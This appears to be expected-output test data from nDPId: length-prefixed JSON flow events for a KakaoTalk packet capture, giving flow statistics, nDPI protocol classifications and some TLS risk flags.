00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
